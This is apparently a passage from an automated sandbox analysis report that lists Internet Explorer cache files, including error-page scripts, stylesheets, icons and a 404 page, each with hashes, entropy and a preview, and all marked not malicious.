                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:3llVuiPjlXJYhg5suRd8PImMo23C/kHrJ8yA/NIeYoWg78C/vTFvbKLAh3:V/XPYhiPRd8j7+9LoIrobtHTdbKi
                                                                                                                                                                MD5:20F0110ED5E4E0D5384A496E4880139B
                                                                                                                                                                SHA1:51F5FC61D8BF19100DF0F8AADAA57FCD9C086255
                                                                                                                                                                SHA-256:1471693BE91E53C2640FE7BAEECBC624530B088444222D93F2815DFCE1865D5B
                                                                                                                                                                SHA-512:5F52C117E346111D99D3B642926139178A80B9EC03147C00E27F07AAB47FE38E9319FE983444F3E0E36DEF1E86DD7C56C25E44B14EFDC3F13B45EDEDA064DB5A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: ......JFIF.....d.d......Ducky.......P......Adobe.d................................................................................................................................................. ...............W..............................................................Qa.................................?......%.....x......s...Z.......j.T.wz.6...X.@... V.3tM...P@.u.%...m..D.25...T...F.........p......A..........BP..qD.(.........ntH.@......h?..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\bullet[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):447
                                                                                                                                                                Entropy (8bit):7.304718288205936
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:6v/71Cyt/JNTWxGdr+kZDWO7+4dKIv0b1GKuxu+R:/yBJNTqsSk9BTwE05su+R
                                                                                                                                                                MD5:26F971D87CA00E23BD2D064524AEF838
                                                                                                                                                                SHA1:7440BEFF2F4F8FABC9315608A13BF26CABAD27D9
                                                                                                                                                                SHA-256:1D8E5FD3C1FD384C0A7507E7283C7FE8F65015E521B84569132A7EABEDC9D41D
                                                                                                                                                                SHA-512:C62EB51BE301BB96C80539D66A73CD17CA2021D5D816233853A37DB72E04050271E581CC99652F3D8469B390003CA6C62DAD2A9D57164C620B7777AE99AA1B15
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .PNG........IHDR...............ex....PLTE...(EkFRp&@e&@e)Af)AgANjBNjDNjDNj2Vv-Xz-Y{3XyC\}E_.2j.3l.8p.7q.;j.;l.Zj.\l.5o.7q.<..aw.<..dz.E...........1..@.7..~.....9..:.....A..B..E..9..:..a..c..b..g.#M.%O.#r.#s.%y.2..4..+..-..?..@..;..p..s...G..H..M.........z`....#tRNS................................../,....mIDATx^..C..`.......S....y'...05...|..k.X......*`.F.K....JQ..u.<.}.. ..[U..m....'r%.......yn.`.7F..).5..b..rX.T.....IEND.B`.
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\down[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):748
                                                                                                                                                                Entropy (8bit):7.249606135668305
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                                                                                                                                                MD5:C4F558C4C8B56858F15C09037CD6625A
                                                                                                                                                                SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                                                                                                                                SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                                                                                                                                SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\errorPageStrings[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4720
                                                                                                                                                                Entropy (8bit):5.164796203267696
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                                                                                                                                                MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                                                                                                                                                SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                                                                                                                                                SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                                                                                                                                                SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\httpErrorPagesScripts[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):12105
                                                                                                                                                                Entropy (8bit):5.451485481468043
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                                                                                                                                                MD5:9234071287E637F85D721463C488704C
                                                                                                                                                                SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                                                                                                                                SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                                                                                                                                SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\info_48[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:PNG image data, 47 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):4113
                                                                                                                                                                Entropy (8bit):7.9370830126943375
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:WNTJL8szf79M8FUjE39KJoUUuJPnvmKacs6Uq7qDMj1XPL:WNrzFoQSJPnvzs6rL
                                                                                                                                                                MD5:5565250FCC163AA3A79F0B746416CE69
                                                                                                                                                                SHA1:B97CC66471FCDEE07D0EE36C7FB03F342C231F8F
                                                                                                                                                                SHA-256:51129C6C98A82EA491F89857C31146ECEC14C4AF184517450A7A20C699C84859
                                                                                                                                                                SHA-512:E60EA153B0FECE4D311769391D3B763B14B9A140105A36A13DAD23C2906735EAAB9092236DEB8C68EF078E8864D6E288BEF7EF1731C1E9F1AD9B0170B95AC134
                                                                                                                                                                Malicious:false
                                                                                                                                                                IE Cache URL:res://ieframe.dll/info_48.png
                                                                                                                                                                Preview: .PNG........IHDR.../...0.......#.....IDATx^...pUU..{....KB........!....F......jp.Q.......Vg.F..m.Q....{...,m.@.56D...&$d!.<..}....s..K9.....{............[./<..T..I.I..JR)).9.k.N.%.E.W^}....Po..............X..;.=.P......./...+...9./..s.....9..|.......*.7v.`..V.....-^.$S[[[......K..z......3..3....5 ...0.."/n/.c...&.{.ht..?....A..I{.n.....|....t......N}..%.v...:.E..i....`....a.k.mg.LX..fcFU.fO-..YEfd.}...~."......}l$....^.re..'^X..*}.?.^U.G..... .30...X......f[.l0.P`..KC...[..[..6....~..i..Q.|;x..T ..........s.5...n+.0..;...H#.2..#.M..m[^3x&E.Ya..\K..{[..M..g...yf0..~....M.]7..ZZZ:..a.O.G64]....9..l[..a....N,,.h......5...f*.y...}...BX{.G^...?.c.......s^..P.(..G...t.0.:.X.DCs.....]vf...py).........x..>-..Be.a...G...Y!...z...g.{....d.s.o.....%.x......R.W.....Z.b,....!..6Ub....U.qY(/v..m.a...4.`Qr\.E.G..a)..t..e.j.W........C<.1.....c..l1w....]3%....tR;.,..3..-.NW.5...t..H..h..D..b......M....)B..2J...)..o..m..M.t....wn./....+Wv....xkg..*..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\ErrorPageTemplate[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2168
                                                                                                                                                                Entropy (8bit):5.207912016937144
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:5+j5xU5k5N0ndgvoyeP0yyiyQCDr3nowMVworDtX3orKxWxDnCMA0da+hieyuSQK:5Q5K5k5pvFehWrrarrZIrHd3FIQfOS6
                                                                                                                                                                MD5:F4FE1CB77E758E1BA56B8A8EC20417C5
                                                                                                                                                                SHA1:F4EDA06901EDB98633A686B11D02F4925F827BF0
                                                                                                                                                                SHA-256:8D018639281B33DA8EB3CE0B21D11E1D414E59024C3689F92BE8904EB5779B5F
                                                                                                                                                                SHA-512:62514AB345B6648C5442200A8E9530DFB88A0355E262069E0A694289C39A4A1C06C6143E5961074BFAC219949102A416C09733F24E8468984B96843DC222B436
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .body..{...font-family: "Segoe UI", "verdana", "arial";...background-image: url(background_gradient.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;...color: #575757;..}....body.securityError..{...font-family: "Segoe UI", "verdana" , "Arial";...background-image: url(background_gradient_red.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;..}....body.tabInfo..{...background-image: none;...background-color: #F4F4F4;..}.. ..a..{...color: rgb(19,112,171);.font-size: 1em;...font-weight: normal;...text-decoration: none;...margin-left: 0px;...vertical-align: top;..}....a:link, a:visited..{...color: rgb(19,112,171);...text-decoration: none;...vertical-align: top;..}....a:hover..{...color: rgb(7,74,229);...text-decoration: underline;..}....p..{...font-size: 0.9em;..}.....h1 /* used for Title */..{...color: #4465A2;...font-size: 1.1em;...font-weight: normal;...vertical-align
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\ErrorPageTemplate[2]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2168
                                                                                                                                                                Entropy (8bit):5.207912016937144
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:5+j5xU5k5N0ndgvoyeP0yyiyQCDr3nowMVworDtX3orKxWxDnCMA0da+hieyuSQK:5Q5K5k5pvFehWrrarrZIrHd3FIQfOS6
                                                                                                                                                                MD5:F4FE1CB77E758E1BA56B8A8EC20417C5
                                                                                                                                                                SHA1:F4EDA06901EDB98633A686B11D02F4925F827BF0
                                                                                                                                                                SHA-256:8D018639281B33DA8EB3CE0B21D11E1D414E59024C3689F92BE8904EB5779B5F
                                                                                                                                                                SHA-512:62514AB345B6648C5442200A8E9530DFB88A0355E262069E0A694289C39A4A1C06C6143E5961074BFAC219949102A416C09733F24E8468984B96843DC222B436
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .body..{...font-family: "Segoe UI", "verdana", "arial";...background-image: url(background_gradient.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;...color: #575757;..}....body.securityError..{...font-family: "Segoe UI", "verdana" , "Arial";...background-image: url(background_gradient_red.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;..}....body.tabInfo..{...background-image: none;...background-color: #F4F4F4;..}.. ..a..{...color: rgb(19,112,171);.font-size: 1em;...font-weight: normal;...text-decoration: none;...margin-left: 0px;...vertical-align: top;..}....a:link, a:visited..{...color: rgb(19,112,171);...text-decoration: none;...vertical-align: top;..}....a:hover..{...color: rgb(7,74,229);...text-decoration: underline;..}....p..{...font-size: 0.9em;..}.....h1 /* used for Title */..{...color: #4465A2;...font-size: 1.1em;...font-weight: normal;...vertical-align
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\background_gradient[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1x800, frames 3
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):453
                                                                                                                                                                Entropy (8bit):5.019973044227213
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:3llVuiPjlXJYhg5suRd8PImMo23C/kHrJ8yA/NIeYoWg78C/vTFvbKLAh3:V/XPYhiPRd8j7+9LoIrobtHTdbKi
                                                                                                                                                                MD5:20F0110ED5E4E0D5384A496E4880139B
                                                                                                                                                                SHA1:51F5FC61D8BF19100DF0F8AADAA57FCD9C086255
                                                                                                                                                                SHA-256:1471693BE91E53C2640FE7BAEECBC624530B088444222D93F2815DFCE1865D5B
                                                                                                                                                                SHA-512:5F52C117E346111D99D3B642926139178A80B9EC03147C00E27F07AAB47FE38E9319FE983444F3E0E36DEF1E86DD7C56C25E44B14EFDC3F13B45EDEDA064DB5A
                                                                                                                                                                Malicious:false
                                                                                                                                                                IE Cache URL:res://ieframe.dll/background_gradient.jpg
                                                                                                                                                                Preview: ......JFIF.....d.d......Ducky.......P......Adobe.d................................................................................................................................................. ...............W..............................................................Qa.................................?......%.....x......s...Z.......j.T.wz.6...X.@... V.3tM...P@.u.%...m..D.25...T...F.........p......A..........BP..qD.(.........ntH.@......h?..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\bullet[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):447
                                                                                                                                                                Entropy (8bit):7.304718288205936
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:6v/71Cyt/JNTWxGdr+kZDWO7+4dKIv0b1GKuxu+R:/yBJNTqsSk9BTwE05su+R
                                                                                                                                                                MD5:26F971D87CA00E23BD2D064524AEF838
                                                                                                                                                                SHA1:7440BEFF2F4F8FABC9315608A13BF26CABAD27D9
                                                                                                                                                                SHA-256:1D8E5FD3C1FD384C0A7507E7283C7FE8F65015E521B84569132A7EABEDC9D41D
                                                                                                                                                                SHA-512:C62EB51BE301BB96C80539D66A73CD17CA2021D5D816233853A37DB72E04050271E581CC99652F3D8469B390003CA6C62DAD2A9D57164C620B7777AE99AA1B15
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .PNG........IHDR...............ex....PLTE...(EkFRp&@e&@e)Af)AgANjBNjDNjDNj2Vv-Xz-Y{3XyC\}E_.2j.3l.8p.7q.;j.;l.Zj.\l.5o.7q.<..aw.<..dz.E...........1..@.7..~.....9..:.....A..B..E..9..:..a..c..b..g.#M.%O.#r.#s.%y.2..4..+..-..?..@..;..p..s...G..H..M.........z`....#tRNS................................../,....mIDATx^..C..`.......S....y'...05...|..k.X......*`.F.K....JQ..u.<.}.. ..[U..m....'r%.......yn.`.7F..).5..b..rX.T.....IEND.B`.
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\down[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):748
                                                                                                                                                                Entropy (8bit):7.249606135668305
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                                                                                                                                                MD5:C4F558C4C8B56858F15C09037CD6625A
                                                                                                                                                                SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                                                                                                                                SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                                                                                                                                SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\errorPageStrings[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4720
                                                                                                                                                                Entropy (8bit):5.164796203267696
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                                                                                                                                                MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                                                                                                                                                SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                                                                                                                                                SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                                                                                                                                                SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\errorPageStrings[2]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):4720
                                                                                                                                                                Entropy (8bit):5.164796203267696
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                                                                                                                                                MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                                                                                                                                                SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                                                                                                                                                SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                                                                                                                                                SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                                                                                                                                                Malicious:false
                                                                                                                                                                IE Cache URL:res://ieframe.dll/errorPageStrings.js
                                                                                                                                                                Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\httpErrorPagesScripts[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):12105
                                                                                                                                                                Entropy (8bit):5.451485481468043
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                                                                                                                                                MD5:9234071287E637F85D721463C488704C
                                                                                                                                                                SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                                                                                                                                SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                                                                                                                                SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                                                                                                                                Malicious:false
                                                                                                                                                                IE Cache URL:res://ieframe.dll/httpErrorPagesScripts.js
                                                                                                                                                                Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\http_404[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):6495
                                                                                                                                                                Entropy (8bit):3.8998802417135856
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:up4d0yV4VkBXvLutC5N9J/1a5TI7kZ3GUXn3GFa7K083GJehBu01kptk7KwyBwpM:uKp6yN9JaKktZX36a7x05hwW7RM
                                                                                                                                                                MD5:F65C729DC2D457B7A1093813F1253192
                                                                                                                                                                SHA1:5006C9B50108CF582BE308411B157574E5A893FC
                                                                                                                                                                SHA-256:B82BFB6FA37FD5D56AC7C00536F150C0F244C81F1FC2D4FEFBBDC5E175C71B4F
                                                                                                                                                                SHA-512:717AFF18F105F342103D36270D642CC17BD9921FF0DBC87E3E3C2D897F490F4ECFAB29CF998D6D99C4951C3EABB356FE759C3483A33704CE9FCC1F546EBCBBC7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">....<html dir="ltr">.... <head>.. <link rel="stylesheet" type="text/css" href="ErrorPageTemplate.css">.... <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.... <title>HTTP 404 Not Found</title>.... <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:initHomepage(); expandCollapse('infoBlockID', true); initGoBack(); initMoreInfo('infoBlockID');">.... <table width="730" cellpadding="0" cellspacing="0" border="0">.... Error title -->.. <tr>.. <td id="infoIconAlign" width="60" align="left" valign="top" rowspan="2">.. <img src="info_48.png" id="infoIcon" alt="Info icon">..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\http_404[2]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):6495
                                                                                                                                                                Entropy (8bit):3.8998802417135856
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:up4d0yV4VkBXvLutC5N9J/1a5TI7kZ3GUXn3GFa7K083GJehBu01kptk7KwyBwpM:uKp6yN9JaKktZX36a7x05hwW7RM
                                                                                                                                                                MD5:F65C729DC2D457B7A1093813F1253192
                                                                                                                                                                SHA1:5006C9B50108CF582BE308411B157574E5A893FC
                                                                                                                                                                SHA-256:B82BFB6FA37FD5D56AC7C00536F150C0F244C81F1FC2D4FEFBBDC5E175C71B4F
